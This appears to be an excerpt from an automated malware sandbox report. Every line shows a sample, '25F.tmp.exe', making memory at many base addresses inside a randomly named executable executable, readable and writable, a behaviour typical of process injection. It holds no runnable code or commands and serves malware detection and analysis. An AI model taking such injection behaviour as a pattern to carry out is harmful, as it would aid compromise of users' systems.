            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 7F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
